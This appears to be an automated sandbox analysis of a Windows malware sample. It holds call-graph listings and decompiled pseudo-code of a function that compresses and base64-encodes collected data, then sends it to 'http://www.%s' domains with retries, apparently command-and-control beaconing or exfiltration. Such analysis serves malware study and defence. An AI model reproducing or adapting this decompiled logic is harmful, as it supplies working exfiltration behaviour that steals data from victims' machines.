15471->15466 15474 c79a46 _free 20 API calls 15472->15474 15529 c79a10 15473->15529 15476 c83c64 15474->15476 15477 c79a33 __dosmaperr 20 API calls 15476->15477 15477->15466 15570 c820f3 LeaveCriticalSection 15478->15570 15480 c83a99 15480->15416 15534 c83f3d 15481->15534 15556 c83050 15484->15556 15486 c83671 15487 c83676 15486->15487 15488 c79e50 pre_c_initialization 38 API calls 15486->15488 15487->15447 15487->15448 15489 c83699 15488->15489 15489->15487 15490 c836b7 GetConsoleMode 15489->15490 15490->15487 15492 c83619 15491->15492 15494 c8364e 15491->15494 15493 c83650 GetLastError 15492->15493 15492->15494 15495 c84131 WriteConsoleW CreateFileW 15492->15495 15493->15494 15494->15464 15495->15492 15502 c835b6 15496->15502 15505 c834a4 15496->15505 15497 c7de3e TranslatorGuardHandler 5 API calls 15499 c835f0 15497->15499 15499->15464 15500 c82a0f 40 API calls __fassign 15500->15505 15501 c8352a WideCharToMultiByte 15501->15502 15503 c83550 WriteFile 15501->15503 15502->15497 15504 c835d9 GetLastError 15503->15504 15503->15505 15504->15502 15505->15500 15505->15501 15505->15502 15506 c83581 WriteFile 15505->15506 15565 c79a59 15505->15565 15506->15504 15506->15505 15509 c837c5 15507->15509 15508 c83887 15511 c7de3e TranslatorGuardHandler 5 API calls 15508->15511 15509->15508 15510 c83843 WriteFile 15509->15510 15510->15509 15512 c83889 GetLastError 15510->15512 15513 c838a0 15511->15513 15512->15508 15513->15464 15521 c838b3 15514->15521 15515 c839be 15516 c7de3e TranslatorGuardHandler 5 API calls 15515->15516 15518 c839cd 15516->15518 15517 c83935 WideCharToMultiByte 15519 c8396a WriteFile 15517->15519 15520 c839b6 GetLastError 15517->15520 15518->15464 15519->15520 15519->15521 15520->15515 15521->15515 15521->15517 15521->15519 15524 c836e6 15522->15524 15523 c83799 15526 c7de3e TranslatorGuardHandler 5 API calls 15523->15526 15524->15523 15525 c83758 WriteFile 15524->15525 15525->15524 15527 c8379b GetLastError 15525->15527 15528 c837b2 15526->15528 15527->15523 15528->15464 15530 c79a33 __dosmaperr 20 API calls 15529->15530 15531 c79a1b _free 15530->15531 15532 c79a46 _free 20 API calls 15531->15532 15533 c79a2e 15532->15533 15533->15466 15543 c821a7 15534->15543 15536 c83f4f 15537 c83f68 SetFilePointerEx 15536->15537 15538 c83f57 15536->15538 15539 c83f80 GetLastError 15537->15539 15542 c83f5c 15537->15542 15540 c79a46 _free 20 API calls 15538->15540 15541 c79a10 __dosmaperr 20 API calls 15539->15541 15540->15542 15541->15542 15542->15438 15544 c821c9 15543->15544 15545 c821b4 15543->15545 15548 c79a33 __dosmaperr 20 API calls 15544->15548 15550 c821ee 15544->15550 15546 c79a33 __dosmaperr 20 API calls 15545->15546 15547 c821b9 15546->15547 15549 c79a46 _free 20 API calls 15547->15549 15551 c821f9 15548->15551 15552 c821c1 15549->15552 15550->15536 15553 c79a46 _free 20 API calls 15551->15553 15552->15536 15554 c82201 15553->15554 15555 c7998a pre_c_initialization 26 API calls 15554->15555 15555->15552 15557 c8306a 15556->15557 15558 c8305d 15556->15558 15561 c83076 15557->15561 15562 c79a46 _free 20 API calls 15557->15562 15559 c79a46 _free 20 API calls 15558->15559 15560 c83062 15559->15560 15560->15486 15561->15486 15563 c83097 15562->15563 15564 c7998a pre_c_initialization 26 API calls 15563->15564 15564->15560 15566 c79e50 pre_c_initialization 38 API calls 15565->15566 15567 c79a64 15566->15567 15568 c79f9f __fassign 38 API calls 15567->15568 15569 c79a74 15568->15569 15569->15505 15570->15480 15574 c84430 15571->15574 15573 c844d6 15573->15395 15575 c8443c CallCatchBlock 15574->15575 15585 c820d0 EnterCriticalSection 15575->15585 15577 c8444a 15578 c8447c 15577->15578 15579 c84471 15577->15579 15580 c79a46 _free 20 API calls 15578->15580 15586 c84559 15579->15586 15582 c84477 15580->15582 15601 c844a6 15582->15601 15584 c84499 CallCatchBlock 15584->15573 15585->15577 15587 c821a7 26 API calls 15586->15587 15590 c84569 15587->15590 15588 c8456f 15604 c82116 15588->15604 15590->15588 15593 c821a7 26 API calls 15590->15593 15600 c845a1 15590->15600 15591 c821a7 26 API calls 15594 c845ad CloseHandle 15591->15594 15595 c84598 15593->15595 15594->15588 15596 c845b9 GetLastError 15594->15596 15598 c821a7 26 API calls 15595->15598 15596->15588 15597 c79a10 __dosmaperr 20 API calls 15599 c845e9 15597->15599 15598->15600 15599->15582 15600->15588 15600->15591 15613 c820f3 LeaveCriticalSection 15601->15613 15603 c844b0 15603->15584 15605 c8218c 15604->15605 15606 c82125 15604->15606 15607 c79a46 _free 20 API calls 15605->15607 15606->15605 15612 c8214f 15606->15612 15608 c82191 15607->15608 15609 c79a33 __dosmaperr 20 API calls 15608->15609 15610 c8217c 15609->15610 15610->15597 15610->15599 15611 c82176 SetStdHandle 15611->15610 15612->15610 15612->15611 15613->15603 15614->15369 15615->15349 14146 1172f60 14149 1173090 GetPEB 14146->14149 14148 1172f72 14149->14148 15678 c79d3b 15679 c79d46 15678->15679 15680 c79d56 15678->15680 15684 c79d5c 15679->15684 15683 c7a8fb _free 20 API calls 15683->15680 15685 c79d6f 15684->15685 15686 c79d75 15684->15686 15687 c7a8fb _free 20 API calls 15685->15687 15688 c7a8fb _free 20 API calls 15686->15688 15687->15686 15689 c79d81 15688->15689 15690 c7a8fb _free 20 API calls 15689->15690 15691 c79d8c 15690->15691 15692 c7a8fb _free 20 API calls 15691->15692 15693 c79d97 15692->15693 15694 c7a8fb _free 20 API calls 15693->15694 15695 c79da2 15694->15695 15696 c7a8fb _free 20 API calls 15695->15696 15697 c79dad 15696->15697 15698 c7a8fb _free 20 API calls 15697->15698 15699 c79db8 15698->15699 15700 c7a8fb _free 20 API calls 15699->15700 15701 c79dc3 15700->15701 15702 c7a8fb _free 20 API calls 15701->15702 15703 c79dce 15702->15703 15704 c7a8fb _free 20 API calls 15703->15704 15705 c79ddc 15704->15705 15710 c79c22 15705->15710 15716 c79b2e 15710->15716 15712 c79c46 15713 c79c72 15712->15713 15729 c79b8f 15713->15729 15715 c79c96 15715->15683 15717 c79b3a CallCatchBlock 15716->15717 15724 c7b1a4 EnterCriticalSection 15717->15724 15719 c79b44 15722 c7a8fb _free 20 API calls 15719->15722 15723 c79b6e 15719->15723 15721 c79b7b CallCatchBlock 15721->15712 15722->15723 15725 c79b83 15723->15725 15724->15719 15728 c7b1ec LeaveCriticalSection 15725->15728 15727 c79b8d 15727->15721 15728->15727 15730 c79b9b CallCatchBlock 15729->15730 15737 c7b1a4 EnterCriticalSection 15730->15737 15732 c79ba5 15733 c79e05 _abort 20 API calls 15732->15733 15734 c79bb8 15733->15734 15738 c79bce 15734->15738 15736 c79bc6 CallCatchBlock 15736->15715 15737->15732 15741 c7b1ec LeaveCriticalSection 15738->15741 15740 c79bd8 15740->15736 15741->15740 13710 c7dcba 13715 c7e101 SetUnhandledExceptionFilter 13710->13715 13712 c7dcbf pre_c_initialization 13716 c7c908 13712->13716 13714 c7dcca 13715->13712 13717 c7c914 13716->13717 13718 c7c92e 13716->13718 13717->13718 13719 c79a46 _free 20 API calls 13717->13719 13718->13714 13720 c7c91e 13719->13720 13721 c7998a pre_c_initialization 26 API calls 13720->13721 13722 c7c929 13721->13722 13722->13714 14833 c7ca3a 14836 c7b6dd 14833->14836 14837 c7b6e6 14836->14837 14838 c7b6ef 14836->14838 14837->14838 14839 c7b5dc 52 API calls 14837->14839 14839->14838

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 0 1174ba0-1174bbc CoInitialize 1 1174bc2-1174bff call 1177b70 SetEvent 0->1 2 11756f0-11756fc CoUninitialize 0->2 1->2 6 1174c05-1174c0e 1->6 7 1174c10-1174c21 WaitForSingleObject 6->7 8 1174c28-1174c84 VirtualAlloc * 3 6->8 7->8 11 1174c23 7->11 9 11756eb 8->9 10 1174c8a-1174c8e 8->10 9->2 10->9 12 1174c94-1174c98 10->12 11->2 12->9 13 1174c9e-1174cbd 12->13 15 1174cc3-1174cd0 13->15 16 11752a2-11752b2 13->16 19 1174cd6-1174ce3 15->19 20 117529d 15->20 17 1175325-117534e call 1178370 16->17 18 11752b4-11752be 16->18 34 1175354-117537f lstrlenA * 2 17->34 35 11756b8-11756e5 VirtualFree * 3 17->35 18->17 21 11752c0-11752d1 18->21 22 1174ce5-1174d17 call 1176170 * 2 call 11760c0 19->22 23 1174d1c-1174d29 19->23 21->17 25 11752d3-11752dd 21->25 22->20 28 1174d62-1174d6f 23->28 29 1174d2b-1174d5d call 1176170 * 2 call 11760c0 23->29 25->17 30 11752df-1175322 call 1177b70 25->30 31 1174d71-1174da3 call 1176170 * 2 call 11760c0 28->31 32 1174da8-1174db5 28->32 29->20 30->17 31->20 42 1174db7-1174dd8 GetCurrentThreadId call 1176170 32->42 43 1174e2c-1174e39 32->43 34->35 41 1175385-11753ca wsprintfA CryptBinaryToStringA 34->41 35->9 41->35 48 11753d0-117544e MultiByteToWideChar call 11717d0 41->48 61 1174dfd-1174e04 42->61 62 1174dda-1174dfb call 1176170 call 11760c0 42->62 49 1174e72-1174e7f 43->49 50 1174e3b-1174e6d call 1176170 * 2 call 11760c0 43->50 80 1175454-117545e 48->80 81 117569b-11756a2 48->81 54 1174ee1-1174eee 49->54 55 1174e81-1174eb4 GetSystemMetrics * 2 call 1176170 49->55 50->20 67 1174f40-1174f4d 54->67 68 1174ef0-1174f13 GlobalMemoryStatus call 1176170 54->68 77 1174eb9-1174edc call 1176170 call 11760c0 55->77 75 1174e27 61->75 76 1174e06-1174e24 call 1176170 call 11760c0 61->76 62->75 73 1174f86-1174f93 67->73 74 1174f4f-1174f81 call 1176170 * 2 call 11760c0 67->74 82 1174f18-1174f3b call 1176170 call 11760c0 68->82 91 1174f95-1174fcb call 1176170 * 2 call 11760c0 73->91 92 1174fd0-1174fdd 73->92 74->20 75->20 76->75 77->20 83 1175470-1175477 80->83 84 1175460-117546a 80->84 81->35 93 11756a4-11756b2 VirtualFree 81->93 82->20 95 117551f-1175526 83->95 96 117547d-11754af VirtualFree 83->96 84->83 84->95 91->20 99 1175032-117503f 92->99 100 1174fdf-117502d lstrlenA call 1176170 * 2 call 11760c0 92->100 93->35 95->81 114 117552c-1175540 EnterCriticalSection 95->114 107 11754c0-11754c7 96->107 115 1175096-11750a3 99->115 116 1175041-1175091 lstrlenA call 1176170 * 2 call 11760c0 99->116 100->20 107->95 119 11754c9-11754f5 call 11717d0 107->119 126 1175542-1175573 VirtualAlloc call 1177b70 114->126 127 117558c-11755c1 VirtualAlloc 114->127 120 11750a5-11750ff lstrlenA call 1176170 * 2 call 11760c0 115->120 121 1175104-1175111 115->121 116->20 147 11754fa-117550d 119->147 120->20 138 1175113-117516d lstrlenA call 1176170 * 2 call 11760c0 121->138 139 1175172-117517f 121->139 152 1175578-1175587 126->152 130 11755c7-11755d8 GetTickCount 127->130 131 117568e-1175695 LeaveCriticalSection 127->131 142 117561c-1175659 call 1177b70 * 2 130->142 143 11755da-117561a call 1177b70 * 2 130->143 131->81 138->20 145 1175181-11751db lstrlenA call 1176170 * 2 call 11760c0 139->145 146 11751e0-11751ed 139->146 193 117565c-117568b VirtualFree 142->193 143->193 145->20 163 117523f-117524c 146->163 164 11751ef-117523d lstrlenA call 1176170 * 2 call 11760c0 146->164 159 117550f-1175519 147->159 160 117551b 147->160 152->131 159->160 171 117551d 159->171 160->95 163->20 168 117524e-117529a call 1179b90 call 1176170 * 2 call 11760c0 163->168 164->20 168->20 171->107 193->131
                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E01174BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                                            				long _v52;
                                                                                                                                                                                                                                                                            				void* _v56;
                                                                                                                                                                                                                                                                            				char* _v60;
                                                                                                                                                                                                                                                                            				CHAR* _v64;
                                                                                                                                                                                                                                                                            				intOrPtr* _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				int _v76;
                                                                                                                                                                                                                                                                            				void* _v80;
                                                                                                                                                                                                                                                                            				void* _v84;
                                                                                                                                                                                                                                                                            				void* _v88;
                                                                                                                                                                                                                                                                            				void* _v92;
                                                                                                                                                                                                                                                                            				void* _v96;
                                                                                                                                                                                                                                                                            				void* _v100;
                                                                                                                                                                                                                                                                            				void* _v124;
                                                                                                                                                                                                                                                                            				void* _v132;
                                                                                                                                                                                                                                                                            				void* _v136;
                                                                                                                                                                                                                                                                            				void* _v140;
                                                                                                                                                                                                                                                                            				void* _v144;
                                                                                                                                                                                                                                                                            				void* _v148;
                                                                                                                                                                                                                                                                            				void* _v152;
                                                                                                                                                                                                                                                                            				void* _v156;
                                                                                                                                                                                                                                                                            				void* _v160;
                                                                                                                                                                                                                                                                            				char _v420;
                                                                                                                                                                                                                                                                            				CHAR* _v424;
                                                                                                                                                                                                                                                                            				int _v428;
                                                                                                                                                                                                                                                                            				void* _v432;
                                                                                                                                                                                                                                                                            				long _v436;
                                                                                                                                                                                                                                                                            				short _v948;
                                                                                                                                                                                                                                                                            				void* _v952;
                                                                                                                                                                                                                                                                            				void* _v956;
                                                                                                                                                                                                                                                                            				void* _v960;
                                                                                                                                                                                                                                                                            				void* _v964;
                                                                                                                                                                                                                                                                            				long _v968;
                                                                                                                                                                                                                                                                            				void* _t306;
                                                                                                                                                                                                                                                                            				void* _t307;
                                                                                                                                                                                                                                                                            				void* _t308;
                                                                                                                                                                                                                                                                            				int _t312;
                                                                                                                                                                                                                                                                            				int _t318;
                                                                                                                                                                                                                                                                            				long _t328;
                                                                                                                                                                                                                                                                            				void* _t333;
                                                                                                                                                                                                                                                                            				void* _t351;
                                                                                                                                                                                                                                                                            				long _t358;
                                                                                                                                                                                                                                                                            				void* _t637;
                                                                                                                                                                                                                                                                            				void* _t638;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                            				_v8 = _a4;
                                                                                                                                                                                                                                                                            				if(_v8 == 0) {
                                                                                                                                                                                                                                                                            					L83:
                                                                                                                                                                                                                                                                            					__imp__CoUninitialize(); // executed
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					E01177B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                            					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                            					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                            					_v40 = 0xea60;
                                                                                                                                                                                                                                                                            					_v44 = _v28;
                                                                                                                                                                                                                                                                            					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                            						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                            						_v52 = 0x100000;
                                                                                                                                                                                                                                                                            						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v48 = _t306;
                                                                                                                                                                                                                                                                            						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v56 = _t307;
                                                                                                                                                                                                                                                                            						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            						_v60 = _t308;
                                                                                                                                                                                                                                                                            						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                            							L82:
                                                                                                                                                                                                                                                                            							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v68 = _v48;
                                                                                                                                                                                                                                                                            							_v80 = 0;
                                                                                                                                                                                                                                                                            							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                            								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                            							if( *0x11818a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                            								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                            								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                            								E01177B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                            								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                            								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                            							_t312 = E01178370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                            							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                            							_v76 = _t312;
                                                                                                                                                                                                                                                                            							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                            								L81:
                                                                                                                                                                                                                                                                            								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								goto L82;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                            								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                            								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                            									goto L81;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                            								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                            								_v428 = 0x100000;
                                                                                                                                                                                                                                                                            								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                            									goto L81;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v956 = 0;
                                                                                                                                                                                                                                                                            								_v432 = 0;
                                                                                                                                                                                                                                                                            								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                            								_v952 = 0;
                                                                                                                                                                                                                                                                            								_t328 = E011717D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                            								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                            								_v436 = _t328;
                                                                                                                                                                                                                                                                            								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                            									L79:
                                                                                                                                                                                                                                                                            									if(_v956 != 0) {
                                                                                                                                                                                                                                                                            										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L81;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                            									if( *0x11818a4 != 1) {
                                                                                                                                                                                                                                                                            										goto L70;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            									_v956 = 0;
                                                                                                                                                                                                                                                                            									_v432 = 0;
                                                                                                                                                                                                                                                                            									_v960 = 0;
                                                                                                                                                                                                                                                                            									while(_v960 < 4) {
                                                                                                                                                                                                                                                                            										_t358 = E011717D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                            										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                            										_v436 = _t358;
                                                                                                                                                                                                                                                                            										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                            											goto L70;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L70;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									L70:
                                                                                                                                                                                                                                                                            									if(_v436 > 0) {
                                                                                                                                                                                                                                                                            										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                            										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                            											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                            											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            											_v964 = _t333;
                                                                                                                                                                                                                                                                            											if(_v964 != 0) {
                                                                                                                                                                                                                                                                            												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                            													E01177B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                            													E01177B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                            													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													E01177B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                            													E01177B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                            													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                            												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                            											E01177B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                            											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                            											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L79;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L83;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
























































                                                                                                                                                                                                                                                                            0x01174bac
                                                                                                                                                                                                                                                                            0x01174bb5
                                                                                                                                                                                                                                                                            0x01174bbc
                                                                                                                                                                                                                                                                            0x011756f0
                                                                                                                                                                                                                                                                            0x011756f0
                                                                                                                                                                                                                                                                            0x011756fc
                                                                                                                                                                                                                                                                            0x01174bc2
                                                                                                                                                                                                                                                                            0x01174bcc
                                                                                                                                                                                                                                                                            0x01174bd1
                                                                                                                                                                                                                                                                            0x01174bdb
                                                                                                                                                                                                                                                                            0x01174be1
                                                                                                                                                                                                                                                                            0x01174beb
                                                                                                                                                                                                                                                                            0x01174bf9
                                                                                                                                                                                                                                                                            0x01174c31
                                                                                                                                                                                                                                                                            0x01174c34
                                                                                                                                                                                                                                                                            0x01174c49
                                                                                                                                                                                                                                                                            0x01174c4f
                                                                                                                                                                                                                                                                            0x01174c60
                                                                                                                                                                                                                                                                            0x01174c66
                                                                                                                                                                                                                                                                            0x01174c77
                                                                                                                                                                                                                                                                            0x01174c7d
                                                                                                                                                                                                                                                                            0x01174c84
                                                                                                                                                                                                                                                                            0x011756eb
                                                                                                                                                                                                                                                                            0x01174bf6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01174c9e
                                                                                                                                                                                                                                                                            0x01174ca1
                                                                                                                                                                                                                                                                            0x01174ca4
                                                                                                                                                                                                                                                                            0x01174cb6
                                                                                                                                                                                                                                                                            0x01174cb3
                                                                                                                                                                                                                                                                            0x01174cb3
                                                                                                                                                                                                                                                                            0x011752a8
                                                                                                                                                                                                                                                                            0x011752b2
                                                                                                                                                                                                                                                                            0x011752eb
                                                                                                                                                                                                                                                                            0x011752f3
                                                                                                                                                                                                                                                                            0x0117530e
                                                                                                                                                                                                                                                                            0x01175313
                                                                                                                                                                                                                                                                            0x01175322
                                                                                                                                                                                                                                                                            0x01175322
                                                                                                                                                                                                                                                                            0x0117532b
                                                                                                                                                                                                                                                                            0x0117533f
                                                                                                                                                                                                                                                                            0x01175344
                                                                                                                                                                                                                                                                            0x01175347
                                                                                                                                                                                                                                                                            0x0117534e
                                                                                                                                                                                                                                                                            0x011756b8
                                                                                                                                                                                                                                                                            0x011756c3
                                                                                                                                                                                                                                                                            0x011756d4
                                                                                                                                                                                                                                                                            0x011756e5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01175354
                                                                                                                                                                                                                                                                            0x01175354
                                                                                                                                                                                                                                                                            0x01175362
                                                                                                                                                                                                                                                                            0x0117537f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01175397
                                                                                                                                                                                                                                                                            0x0117539d
                                                                                                                                                                                                                                                                            0x011753a0
                                                                                                                                                                                                                                                                            0x011753ca
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011753d0
                                                                                                                                                                                                                                                                            0x011753da
                                                                                                                                                                                                                                                                            0x011753fd
                                                                                                                                                                                                                                                                            0x01175403
                                                                                                                                                                                                                                                                            0x01175439
                                                                                                                                                                                                                                                                            0x0117543e
                                                                                                                                                                                                                                                                            0x01175441
                                                                                                                                                                                                                                                                            0x0117544e
                                                                                                                                                                                                                                                                            0x0117569b
                                                                                                                                                                                                                                                                            0x011756a2
                                                                                                                                                                                                                                                                            0x011756b2
                                                                                                                                                                                                                                                                            0x011756b2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011756a2
                                                                                                                                                                                                                                                                            0x0117545e
                                                                                                                                                                                                                                                                            0x01175477
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117548b
                                                                                                                                                                                                                                                                            0x01175491
                                                                                                                                                                                                                                                                            0x0117549b
                                                                                                                                                                                                                                                                            0x011754a5
                                                                                                                                                                                                                                                                            0x011754c0
                                                                                                                                                                                                                                                                            0x011754f5
                                                                                                                                                                                                                                                                            0x011754fa
                                                                                                                                                                                                                                                                            0x011754fd
                                                                                                                                                                                                                                                                            0x0117550d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117551d
                                                                                                                                                                                                                                                                            0x011754ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011754ba
                                                                                                                                                                                                                                                                            0x0117550d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117551f
                                                                                                                                                                                                                                                                            0x0117551f
                                                                                                                                                                                                                                                                            0x01175526
                                                                                                                                                                                                                                                                            0x01175533
                                                                                                                                                                                                                                                                            0x01175540
                                                                                                                                                                                                                                                                            0x01175598
                                                                                                                                                                                                                                                                            0x011755ae
                                                                                                                                                                                                                                                                            0x011755b4
                                                                                                                                                                                                                                                                            0x011755c1
                                                                                                                                                                                                                                                                            0x011755d8
                                                                                                                                                                                                                                                                            0x01175631
                                                                                                                                                                                                                                                                            0x01175654
                                                                                                                                                                                                                                                                            0x01175659
                                                                                                                                                                                                                                                                            0x011755da
                                                                                                                                                                                                                                                                            0x011755ef
                                                                                                                                                                                                                                                                            0x01175612
                                                                                                                                                                                                                                                                            0x01175617
                                                                                                                                                                                                                                                                            0x01175617
                                                                                                                                                                                                                                                                            0x0117566b
                                                                                                                                                                                                                                                                            0x0117567c
                                                                                                                                                                                                                                                                            0x0117568b
                                                                                                                                                                                                                                                                            0x0117568b
                                                                                                                                                                                                                                                                            0x01175542
                                                                                                                                                                                                                                                                            0x01175552
                                                                                                                                                                                                                                                                            0x0117555b
                                                                                                                                                                                                                                                                            0x01175573
                                                                                                                                                                                                                                                                            0x01175578
                                                                                                                                                                                                                                                                            0x01175584
                                                                                                                                                                                                                                                                            0x01175584
                                                                                                                                                                                                                                                                            0x01175695
                                                                                                                                                                                                                                                                            0x01175695
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01175526
                                                                                                                                                                                                                                                                            0x0117545e
                                                                                                                                                                                                                                                                            0x0117534e
                                                                                                                                                                                                                                                                            0x01174c84
                                                                                                                                                                                                                                                                            0x00000000
